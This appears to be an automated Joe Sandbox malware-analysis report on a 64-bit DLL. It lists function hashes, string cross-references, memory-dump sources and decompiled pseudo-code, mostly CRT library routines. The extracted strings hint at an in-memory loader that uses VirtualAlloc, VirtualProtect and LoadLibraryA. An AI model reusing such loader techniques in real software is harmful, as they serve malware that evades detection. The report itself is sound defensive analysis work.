Virt, xrefs: 000002A6836500AD
rote, xrefs: 000002A6836500D5
ddFu, xrefs: 000002A68365013A
ativ, xrefs: 000002A68365010F
ct, xrefs: 000002A6836500DD
Load, xrefs: 000002A683650095
aryA, xrefs: 000002A6836500A5
ncti, xrefs: 000002A683650141
Flus, xrefs: 000002A6836500E4
onTa, xrefs: 000002A683650148
RtlA, xrefs: 000002A683650133
nf, xrefs: 000002A683650127
ualA, xrefs: 000002A6836500B5
truc, xrefs: 000002A6836500F2
Slee, xrefs: 000002A683650084
eSys, xrefs: 000002A683650117
o, xrefs: 000002A68365012E
ualP, xrefs: 000002A6836500CD
tion, xrefs: 000002A6836500F9
GetN, xrefs: 000002A683650107
Libr, xrefs: 000002A68365009D
Virt, xrefs: 000002A6836500C5
hIns, xrefs: 000002A6836500EB
Cach, xrefs: 000002A683650100
temI, xrefs: 000002A68365011F

Memory Dump Source

Source File: 00000000.00000002.264095651.000002A683650000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002A683650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a683650000_loaddll64.jbxd

Similarity

API ID: Virtual$AllocInfoNativeNodeProtectRemoveSystem
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 1419936716-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: b5dcc9b3aa80ffb6833ef6fe11ed0b676913f28384d9daa2befc9ff1a0576d3e
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 8C62D330618B09CFD719DF18C8897A9B7E4FB55304F18466DE88AC7252DF38E486CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004DDC Relevance: 7.8, Strings: 6, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

w, xrefs: 00000001800050FF
3C, xrefs: 0000000180005284
u, xrefs: 0000000180004DEF
+, xrefs: 000000018000530C
Q+, xrefs: 000000018000533C
@_, xrefs: 0000000180004EFC

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: @_$Q+$w$+$3C$u
API String ID: 0-4152583413
Opcode ID: 9f8a14a22d69b5951a2631c0067e0fc4d36d0f639cba0d102428ca4f006b14de
Instruction ID: b6ea412dc30f19c74fb4b1663690e8dc750e0b49b1240d0c045de5a6b9424b82
Opcode Fuzzy Hash: 9f8a14a22d69b5951a2631c0067e0fc4d36d0f639cba0d102428ca4f006b14de
Instruction Fuzzy Hash: 7D02F67151038DEFDB98DF24C889ADD3BA1FB58398F952219FC0A972A0C774D985CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028C94 Relevance: 6.5, Strings: 5, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

rS, xrefs: 0000000180028F00
SW, xrefs: 0000000180028CD3
t.?8, xrefs: 0000000180029073
r, xrefs: 0000000180028EC9
3m, xrefs: 0000000180029083

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 3m$SW$rS$r$t.?8
API String ID: 0-4220278859
Opcode ID: 85a6ee6c84f7a60e958ee75f08787c2d87ed4ffb25c6bd77534bac28b26f7971
Instruction ID: 5729ab1ff226baa14ab4ffc9551888db56205bfd96deea9119b6bbc9091883bb
Opcode Fuzzy Hash: 85a6ee6c84f7a60e958ee75f08787c2d87ed4ffb25c6bd77534bac28b26f7971
Instruction Fuzzy Hash: F2C1EF7151A784ABD388DF28C5CA95BBBE1FBC4744F906A1DF496862A0D7B4D908CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005DB4 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

iP., xrefs: 0000000180005FF3
cG, xrefs: 0000000180006018
Qz, xrefs: 0000000180005E61
>, xrefs: 0000000180005E08
9, xrefs: 0000000180005E00

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 9$>$Qz$cG$iP.
API String ID: 0-2314038544
Opcode ID: 4158940623df5b63cf90af9ecb6c971ef7c92bce548850bfcd4728ba9d0de4d2
Instruction ID: 2738067ee2515d3e4966bb770307c21824dc71e1dd538b0d2de93925eb972619
Opcode Fuzzy Hash: 4158940623df5b63cf90af9ecb6c971ef7c92bce548850bfcd4728ba9d0de4d2
Instruction Fuzzy Hash: 57815D701497888BEBE8DF24C8C5BDA7BE1FB88344F50551DF88A8B290CB75DA44CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800248E0 Relevance: 5.9, Strings: 4, Instructions: 869
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

V%?, xrefs: 0000000180024E1D
kr, xrefs: 0000000180024E1A
Rl, xrefs: 0000000180024C1F
X, xrefs: 0000000180024D35

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Rl$X$kr$V%?
API String ID: 0-1881522904
Opcode ID: 98ff1e27a160c74632e307d872ef1a7f9803bcbde420e3daba4ce0dca79685d9
Instruction ID: 70c5aac2912e64376728126259cd49d2f789cf9a10fb17a3f2cb6be72cb14558
Opcode Fuzzy Hash: 98ff1e27a160c74632e307d872ef1a7f9803bcbde420e3daba4ce0dca79685d9
Instruction Fuzzy Hash: 59A2077051078D8FDB89CF24C88A5DE3BA0FB58398F52531DFC8AA6290D778D595CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800038A5 Relevance: 5.2, Strings: 4, Instructions: 197COMMON

Download Yara Rule

Strings

l@-T, xrefs: 0000000180003AC8
+s, xrefs: 0000000180003B8E
x+MS, xrefs: 00000001800039C2
pN, xrefs: 0000000180003B71

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: +s$l@-T$pN$x+MS
API String ID: 0-3074933293
Opcode ID: 81be9b45353ead76c9a7b6c7e167c5c32a8ae5faee5dc8465e9a6d9c4c43a028
Instruction ID: e901c82c2c3415e94c79d9569d7d5064836046090d2f5b38374df02bf067750a
Opcode Fuzzy Hash: 81be9b45353ead76c9a7b6c7e167c5c32a8ae5faee5dc8465e9a6d9c4c43a028
Instruction Fuzzy Hash: A991597160074D8BEB59CF28C89A6DE3BA1FB58398F51422CFC4A97290CB78D655CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B1E0 Relevance: 4.1, Strings: 3, Instructions: 302COMMON

Download Yara Rule

Strings

\, xrefs: 000000018000B6EF
m)7, xrefs: 000000018000B456
m[+, xrefs: 000000018000B7C8

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: \$m[+$m)7
API String ID: 0-1435720626
Opcode ID: af10a5be19bd77cf0563b38453e590c7ca23ba3a925fd2c55e2086c6d71307a8
Instruction ID: 883ce2ee539239a1f536d03f946b290b5c9bffedac0f26b385fd5492cb17272a
Opcode Fuzzy Hash: af10a5be19bd77cf0563b38453e590c7ca23ba3a925fd2c55e2086c6d71307a8
Instruction Fuzzy Hash: C002F6715083C88BEBFADF64C8897DE7BACFB54708F104619EA0A9E298DB745744CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800038DC Relevance: 2.6, Strings: 2, Instructions: 90COMMON

Download Yara Rule

Strings

x+MS, xrefs: 00000001800039C2
8, xrefs: 0000000180003A1F

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: x+MS$8
API String ID: 0-2879286383
Opcode ID: 0b36e420fc5be994054ff9bd7cd914dceaa5a559053905e74aaceefae8f335f5
Instruction ID: 069f65542df350c22b25c5b11342d601f1728201a4aced1865a094658918a1cd
Opcode Fuzzy Hash: 0b36e420fc5be994054ff9bd7cd914dceaa5a559053905e74aaceefae8f335f5
Instruction Fuzzy Hash: 42413B7050074D8BEB49CF28C88A6DE3FA1FB18398F61421DFD4A96290D778D598CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009E38 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

{6, xrefs: 000000018000A051

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: {6
API String ID: 0-1346941803
Opcode ID: 8506dbb6b1252c503813ed30af6b5c4e6b9b4570125e6fd192f6fa1e5665ff7b
Instruction ID: 4f9844d0cd30e9af067f9ce6bd73810c55f6bc83b648b6efbf776691940ba2a0
Opcode Fuzzy Hash: 8506dbb6b1252c503813ed30af6b5c4e6b9b4570125e6fd192f6fa1e5665ff7b
Instruction Fuzzy Hash: FA8126B09047098BDF48DFA8C4865EEBBF0FB48358F15821DE80AB7291D7789945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020454 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

1, xrefs: 000000018002050B

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 1
API String ID: 0-4267224553
Opcode ID: 14ae2c29f1f0adff71999c81ec21c279a8b8cf5828faf7ab2494e8710ca5a4c5
Instruction ID: f864b420d3f879fa0c4a6b1c1884d968131e299f1c3c71a38cb5ded6753929e5
Opcode Fuzzy Hash: 14ae2c29f1f0adff71999c81ec21c279a8b8cf5828faf7ab2494e8710ca5a4c5
Instruction Fuzzy Hash: 4881FE705087848FD779DF28C59A6DEBBF1FB89704F004A1DEA8A8B260D7769905CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14664194 Relevance: 18.1, APIs: 12, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FFD7FFD14664194(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x146641d5;
				if (_t5 == 0) goto 0x146641c9;
				if (_t5 == 0) goto 0x146641bc;
				if (__edx == 1) goto 0x146641b5;
				return 1;
			}

0x7ffd14664198
0x7ffd1466419a
0x7ffd1466419f
0x7ffd146641a4
0x7ffd146641a9
0x7ffd146641b4

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFD146641BC
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFD14664211
__scrt_fastfail.LIBCMT ref: 00007FFD1466422D
_RTC_Initialize.LIBCMT ref: 00007FFD14664245
__scrt_initialize_default_local_stdio_options.LIBCMT ref: 00007FFD14664267
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFD14664283
__scrt_release_startup_lock.LIBCMT ref: 00007FFD146642AE
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FFD146642CD

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
String ID:
API String ID: 3885183344-0
Opcode ID: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
Instruction ID: 97385665d71bbd758ec81b59cdfec24f851c7aa8cb5300423eda6cb53b62fd71
Opcode Fuzzy Hash: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
Instruction Fuzzy Hash: 1A517A30F0CE4385FA14AB71E8F12F96696AF573BCF544035E94D4729BCE2CA4858B08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661580 Relevance: 10.6, APIs: 7, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFD7FFD14661580(long long __rcx, long long __rdx, long long _a8, void* _a16) {
				char _v16;
				char _v24;
				long long _v32;
				void* _v40;
				long long _v48;
				long long _v56;
				void* _t41;
				intOrPtr* _t49;
				void* _t77;

				_a16 = __rdx;
				_a8 = __rcx;
				_v32 = 0xfffffffe;
				_t49 = _a16;
				if (_a8 == _t49) goto 0x14661693;
				r8d = 0;
				E00007FFD7FFD14661910(1, _t49, _a8, _t77); // executed
				if (0 == 1) goto 0x1466160a;
				E00007FFD7FFD14661850(_a16);
				_v56 = _t49;
				E00007FFD7FFD14661850(_a8);
				if ((E00007FFD7FFD14662A50(_t49, _v56) & 0x000000ff) == 0) goto 0x1466160a;
				E00007FFD7FFD14661850(_a16);
				E00007FFD7FFD14661870(_t49, _a8, _t49);
				E00007FFD7FFD14661850(_a16);
				_v48 = _t49;
				E00007FFD7FFD14661850(_a8);
				if ((E00007FFD7FFD14662A50(_t49, _v48) & 0x000000ff) == 0) goto 0x1466167a;
				E00007FFD7FFD14661A20(_t49, _a16,  &_v24);
				_v40 = _t49;
				E00007FFD7FFD14661AA0(_t49, _a16,  &_v16);
				_t41 = E00007FFD7FFD14662A90(E00007FFD7FFD14662A50(_t49, _v48) & 0x000000ff, _t49, _a8,  *_t49,  *_v40);
				goto 0x14661693;
				E00007FFD7FFD14662B00(_t41, _a16);
				return E00007FFD7FFD14661F00(_t49, _a8, _t49);
			}

0x7ffd14661580
0x7ffd14661585
0x7ffd1466158e
0x7ffd14661597
0x7ffd146615a1
0x7ffd146615a7
0x7ffd146615b1
0x7ffd146615bc
0x7ffd146615c3
0x7ffd146615c9
0x7ffd146615d3
0x7ffd146615ef
0x7ffd146615f6
0x7ffd14661604
0x7ffd1466160f
0x7ffd14661615
0x7ffd1466161f
0x7ffd1466163b
0x7ffd14661647
0x7ffd1466164d
0x7ffd1466165c
0x7ffd14661672
0x7ffd14661678
0x7ffd1466167f
0x7ffd1466169c

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146615C3
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146615D3
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146615F6

Part of subcall function 00007FFD14661870: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD14661883

Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFD146615E4

Part of subcall function 00007FFD14662A50: type_info::_name_internal_method.LIBCMTD ref: 00007FFD14662A68

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466160F
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466161F
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFD14661630

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::$EmptyQueue::StructuredWork$Affinity::operator!=Hardware$type_info::_name_internal_method
String ID:
API String ID: 1937815552-0
Opcode ID: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
Instruction ID: e333756b94404862e3bfe717553feaad19f49959b1c5f44d7ec4b73a9904fa37
Opcode Fuzzy Hash: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
Instruction Fuzzy Hash: FE31CF3175DE4581EA50EB32E4A14FB6351EBC77F8F005535E98E937AACE2CE4418B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14662600 Relevance: 9.1, APIs: 6, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00007FFD7FFD14662600(long long __rcx, signed int __rdx, long long __r8, long long _a8, signed int _a16, long long _a24) {
				long long _v24;
				long long _v32;
				long long _v40;
				void* _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				char _v112;
				signed long long _v120;
				void* _t82;
				signed long long _t111;
				intOrPtr* _t113;
				intOrPtr* _t114;
				long long _t115;
				intOrPtr* _t116;
				intOrPtr* _t117;
				signed long long _t118;
				long long _t120;
				long long* _t121;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v24 = 0xfffffffe;
				_t111 = _a16 | 0x0000000f;
				_v120 = _t111;
				E00007FFD7FFD14662830(_t111, _a8);
				if (_t111 - _v120 >= 0) goto 0x14662659;
				_v120 = _a16;
				goto 0x14662736;
				_t113 = _v120;
				_v104 = _t113;
				E00007FFD7FFD14662150(_t113, _a8);
				_t114 =  *_t113;
				if (_t114 - _v104 > 0) goto 0x14662696;
				goto 0x14662736;
				E00007FFD7FFD14662150(_t114, _a8);
				_t115 =  *_t114;
				_v96 = _t115;
				E00007FFD7FFD14662830(_t115, _a8);
				_t116 = _t115 - _v96;
				_v88 = _t116;
				E00007FFD7FFD14662150(_t116, _a8);
				if ( *_t116 - _v88 > 0) goto 0x14662724;
				E00007FFD7FFD14662150(_t116, _a8);
				_t117 =  *_t116;
				_v80 = _t117;
				E00007FFD7FFD14662150(_t117, _a8);
				_t118 = _v80 +  *_t117;
				_v120 = _t118;
				goto 0x14662736;
				E00007FFD7FFD14662830(_t118, _a8);
				_v120 = _t118;
				_t120 = _v120 + 1;
				_v72 = _t120;
				E00007FFD7FFD14661850(_a8);
				E00007FFD7FFD146628E0(_t120, _v72); // executed
				_v64 = _t120;
				_t121 = _v64;
				_v112 = _t121;
				goto 0x14662771;
				if (_a24 <= 0) goto 0x146627b0;
				_t82 = E00007FFD7FFD146618F0(_t121, _a8);
				_v40 = _t121;
				E00007FFD7FFD14662C00(_t82, _v112);
				E00007FFD7FFD146611E0(_t121, _v40, _a24);
				r8d = 0;
				E00007FFD7FFD14661910(1, _t121, _a8, _a24);
				E00007FFD7FFD14662BC0(E00007FFD7FFD14662190(_a8), _t121);
				_v32 = _t121;
				E00007FFD7FFD14661850(_a8);
				E00007FFD7FFD14662C10(_t121, _t121, _v32,  &_v112);
				E00007FFD7FFD14662150(_t121, _a8);
				 *_t121 = _v120;
				return E00007FFD7FFD146623A0(_t121, _a8, _a24);
			}

0x7ffd14662600
0x7ffd14662605
0x7ffd1466260a
0x7ffd14662616
0x7ffd1466262a
0x7ffd1466262e
0x7ffd1466263b
0x7ffd14662645
0x7ffd1466264f
0x7ffd14662654
0x7ffd1466265b
0x7ffd14662668
0x7ffd14662675
0x7ffd1466267c
0x7ffd1466268f
0x7ffd14662691
0x7ffd1466269e
0x7ffd146626a5
0x7ffd146626b0
0x7ffd146626bd
0x7ffd146626c7
0x7ffd146626ca
0x7ffd146626d7
0x7ffd146626e4
0x7ffd146626ee
0x7ffd146626f5
0x7ffd14662700
0x7ffd1466270d
0x7ffd1466271a
0x7ffd1466271d
0x7ffd14662722
0x7ffd1466272c
0x7ffd14662731
0x7ffd1466273b
0x7ffd1466273e
0x7ffd1466274b
0x7ffd1466275b
0x7ffd14662760
0x7ffd14662765
0x7ffd1466276a
0x7ffd1466276f
0x7ffd1466277a
0x7ffd14662784
0x7ffd14662789
0x7ffd14662793
0x7ffd146627ab
0x7ffd146627b0
0x7ffd146627bd
0x7ffd146627d2
0x7ffd146627d7
0x7ffd146627e4
0x7ffd146627f9
0x7ffd14662806
0x7ffd14662810
0x7ffd1466282f

APIs

Part of subcall function 00007FFD14662830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466283E
Part of subcall function 00007FFD14662830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFD1466284B

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466274B
type_info::_name_internal_method.LIBCMTD ref: 00007FFD1466275B
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14662784
char_traits.LIBCPMTD ref: 00007FFD146627AB
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146627E4
construct.LIBCPMTD ref: 00007FFD146627F9

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::$Work$EmptyQueue::Structured$Base::$BridgeContextDispatchIdentityQueueSchedulerThrottlerchar_traitsconstructtype_info::_name_internal_method
String ID:
API String ID: 3284725307-0
Opcode ID: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
Instruction ID: 341b945a5b9cfe8f8123036e7bd69e5fcb8b53c55adc900dd385b9a669f6f83f
Opcode Fuzzy Hash: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
Instruction Fuzzy Hash: 1D51C03271DF8585E760EB65E4A13AAA360F7CA7A4F404135EACD87B59DF3CD4108B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466BA4C Relevance: 9.1, APIs: 6, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000,00007FFD1466D8B7,?,?,?), ref: 00007FFD1466BA5B
FlsSetValue.KERNEL32(?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000,00007FFD1466D8B7,?,?,?), ref: 00007FFD1466BA91
FlsSetValue.KERNEL32(?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000,00007FFD1466D8B7,?,?,?), ref: 00007FFD1466BABE
FlsSetValue.KERNEL32(?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000,00007FFD1466D8B7,?,?,?), ref: 00007FFD1466BACF
FlsSetValue.KERNEL32(?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000,00007FFD1466D8B7,?,?,?), ref: 00007FFD1466BAE0
SetLastError.KERNEL32(?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000,00007FFD1466D8B7,?,?,?), ref: 00007FFD1466BAFB

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
Instruction ID: 0829b945d49850770ae31fdd56335e0bb2c082f6fbc814e8141307fbd9247cd0
Opcode Fuzzy Hash: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
Instruction Fuzzy Hash: AE116020B0CE9682FA54677295F11FD22569F4BBB8F148739E96E07AD6DE6CB4818300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661910 Relevance: 7.6, APIs: 5, Instructions: 59
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFD7FFD14661910(signed char __edx, intOrPtr* __rax, long long __rcx, long long __r8, long long _a8, signed char _a16, long long _a24) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t32;
				intOrPtr* _t47;
				long long* _t49;

				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				if ((_a16 & 0x000000ff) != 0) goto 0x14661930;
				goto 0x146619f1;
				E00007FFD7FFD14662150(__rax, _a8);
				if ( *((long long*)(__rax)) - 0x10 < 0) goto 0x146619f1;
				E00007FFD7FFD14662190(_a8);
				_t47 =  *((intOrPtr*)(__rax));
				_v40 = _t47;
				E00007FFD7FFD14662BC0(E00007FFD7FFD14662190(_a8), _t47);
				_v32 = _t47;
				E00007FFD7FFD14661850(_a8);
				_t32 = E00007FFD7FFD14662BD0(_t47, _v32);
				if (_a24 <= 0) goto 0x146619bd;
				E00007FFD7FFD14662C00(_t32, _v40);
				_v24 = _t47;
				E00007FFD7FFD14662190(_a8);
				E00007FFD7FFD146611E0(_t47, _v24, _a24);
				E00007FFD7FFD14662150(_t47, _a8);
				_t49 =  *_t47 + 1;
				_v16 = _t49;
				E00007FFD7FFD14661850(_a8);
				E00007FFD7FFD14662100(_t49, _v40, _v16); // executed
				E00007FFD7FFD14662150(_t49, _a8);
				 *_t49 = 0xf;
				return E00007FFD7FFD146623A0(_t49, _a8, _a24);
			}

0x7ffd14661910
0x7ffd14661915
0x7ffd14661919
0x7ffd14661929
0x7ffd1466192b
0x7ffd14661935
0x7ffd1466193e
0x7ffd14661949
0x7ffd1466194e
0x7ffd14661951
0x7ffd14661963
0x7ffd14661968
0x7ffd14661972
0x7ffd14661982
0x7ffd1466198d
0x7ffd14661994
0x7ffd14661999
0x7ffd146619a3
0x7ffd146619b8
0x7ffd146619c2
0x7ffd146619ca
0x7ffd146619cd
0x7ffd146619d7
0x7ffd146619ec
0x7ffd146619f6
0x7ffd146619fb
0x7ffd14661a15

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD14661972
